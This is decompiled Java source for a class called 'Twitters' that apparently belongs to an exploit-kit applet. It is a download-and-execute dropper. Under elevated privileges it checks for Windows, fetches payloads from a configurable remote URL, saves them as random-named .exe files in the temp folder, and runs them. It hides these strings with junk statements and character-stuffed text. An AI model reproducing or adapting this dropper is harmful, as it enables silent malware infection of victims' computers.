// 
// Decompiled by Procyon v0.5.30
// 

package quote;

import java.security.AccessController;
import java.io.InputStream;
import java.io.FileOutputStream;
import java.io.File;
import java.net.URL;
import java.security.PrivilegedExceptionAction;

public class Twitters implements PrivilegedExceptionAction
{
    public static String data;
    public static String cc;
    
    public static byte[] StringToBytes(final String s) {
        false;
        true;
        false;
        true;
        false;
        true;
        false;
        true;
        false;
        true;
        true;
        false;
        false;
        false;
        false;
        true;
        false;
        final int n = 2;
        false;
        false;
        false;
        true;
        false;
        false;
        final byte[] array = new byte[s.length() / n];
        true;
        false;
        true;
        true;
        false;
        false;
        false;
        true;
        true;
        true;
        true;
        true;
        final int n2 = 16;
        true;
        true;
        false;
        true;
        false;
        true;
        true;
        false;
        false;
        true;
        true;
        false;
        true;
        false;
        for (int i = 0; i < s.length(); i += n) {
            false;
            false;
            false;
            array[i / n] = (byte)((Character.digit(s.charAt(i), n2) << 4) + Character.digit(s.charAt(i + 1), n2));
            true;
            false;
            true;
            true;
            false;
            false;
        }
        true;
        true;
        false;
        false;
        true;
        false;
        true;
        true;
        false;
        false;
        true;
        false;
        true;
        return array;
    }
    
    @Override
    public Object run() throws Exception {
        true;
        true;
        false;
        true;
        false;
        false;
        false;
        true;
        false;
        true;
        true;
        false;
        false;
        false;
        if (Twitters.data == null) {
            return null;
        }
        false;
        true;
        true;
        true;
        false;
        false;
        true;
        true;
        try {
            true;
            false;
            false;
            true;
            true;
            false;
            true;
            true;
            false;
            true;
            false;
            final String property = System.getProperty("hhhhohhhhshh.nhahhme".replace("h", ""));
            true;
            true;
            false;
            true;
            false;
            false;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            true;
            if (property.indexOf("WSiSSSSnSSSSdoSSwSSs".replace("S", "")) == -1) {
                true;
                false;
                false;
                true;
                true;
                true;
                return null;
            }
            true;
            false;
            false;
            true;
            false;
            true;
            false;
            false;
            false;
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            int int1 = 1;
            true;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
            true;
            true;
            false;
            if (Twitters.cc != null) {
                false;
                true;
                false;
                false;
                false;
                true;
                true;
                false;
                int1 = Integer.parseInt(Twitters.cc);
                false;
                false;
                false;
                false;
                true;
                true;
                false;
            }
            true;
            false;
            false;
            true;
            false;
            true;
            true;
            true;
            true;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            true;
            true;
            true;
            true;
            false;
            false;
            for (int i = 0; i < int1; ++i) {
                true;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                true;
                true;
                final String string = Twitters.data + Integer.toString(i);
                true;
                true;
                false;
                false;
                final URL url = new URL(string);
                true;
                false;
                true;
                false;
                false;
                true;
                false;
                true;
                false;
                true;
                true;
                false;
                true;
                url.openConnection();
                true;
                true;
                false;
                true;
                true;
                false;
                true;
                false;
                true;
                false;
                false;
                true;
                true;
                false;
                false;
                true;
                false;
                true;
                false;
                final InputStream openStream = url.openStream();
                false;
                false;
                true;
                true;
                true;
                false;
                false;
                false;
                false;
                false;
                final String property2 = System.getProperty("jSSavSSSSaSS.iSSSSSoSSSS.SSStmSSpSSdiSr".replace("S", ""));
                true;
                true;
                true;
                true;
                true;
                false;
                false;
                true;
                false;
                true;
                false;
                false;
                true;
                true;
                true;
                true;
                true;
                final String string2 = property2 + File.separator;
                true;
                false;
                false;
                true;
                false;
                final String string3 = string2 + Math.random();
                false;
                true;
                true;
                false;
                false;
                true;
                true;
                false;
                true;
                true;
                true;
                final String string4 = string3 + ".7e7777777x7e7".replace("7", "");
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                false;
                true;
                false;
                true;
                false;
                true;
                true;
                false;
                false;
                false;
                true;
                true;
                false;
                true;
                true;
                false;
                true;
                true;
                final FileOutputStream fileOutputStream = new FileOutputStream(string4);
                false;
                false;
                true;
                false;
                false;
                true;
                false;
                true;
                true;
                false;
                false;
                false;
                true;
                false;
                false;
                false;
                false;
                false;
                true;
                true;
                true;
                false;
                false;
                true;
                false;
                false;
                true;
                true;
                false;
                true;
                true;
                true;
                false;
                true;
                false;
                false;
                true;
                true;
                true;
                false;
                true;
                false;
                int n = 0;
                int read;
                while ((read = openStream.read()) != -1) {
                    true;
                    true;
                    true;
                    false;
                    false;
                    false;
                    true;
                    false;
                    false;
                    true;
                    fileOutputStream.write(read);
                    false;
                    true;
                    false;
                    false;
                    true;
                    true;
                    false;
                    true;
                    true;
                    true;
                    ++n;
                }
                true;
                false;
                true;
                true;
                false;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                true;
                openStream.close();
                true;
                true;
                false;
                true;
                false;
                false;
                true;
                true;
                fileOutputStream.close();
                true;
                false;
                true;
                false;
                false;
                false;
                false;
                true;
                true;
                true;
                true;
                false;
                false;
                true;
                false;
                false;
                this.Caller(n, string4);
                false;
                false;
                false;
                false;
                true;
                false;
                false;
                true;
                true;
                true;
            }
            false;
            true;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            false;
            true;
        }
        catch (Exception ex) {
            true;
            false;
            true;
            true;
            false;
            false;
            true;
            false;
            true;
            false;
            true;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            false;
        }
        false;
        true;
        false;
        false;
        false;
        false;
        false;
        true;
        true;
        false;
        true;
        false;
        false;
        true;
        false;
        false;
        false;
        return null;
    }
    
    private void Caller(final int n, final String s) throws Exception {
        final Runtime runtime = Runtime.getRuntime();
        Boolean b = false;
        if (n >= 1024) {
            b = true;
        }
        if (b) {
            this.ef(runtime, s);
        }
    }
    
    private Process ef(final Runtime runtime, final String s) throws Exception {
        true;
        true;
        false;
        true;
        false;
        false;
        false;
        true;
        false;
        false;
        return runtime.exec(s, null, null);
    }
    
    public Twitters() {
        true;
        false;
        true;
        true;
        false;
        true;
        false;
        true;
        false;
        false;
        try {
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            false;
            AccessController.doPrivileged((PrivilegedExceptionAction<Object>)this);
            false;
            false;
            false;
        }
        catch (Exception ex) {
            true;
            false;
            false;
            false;
            true;
            false;
            false;
            false;
            true;
        }
        true;
        false;
        false;
        false;
        true;
        false;
    }
    
    static {
        Twitters.data = null;
        Twitters.cc = null;
    }
}
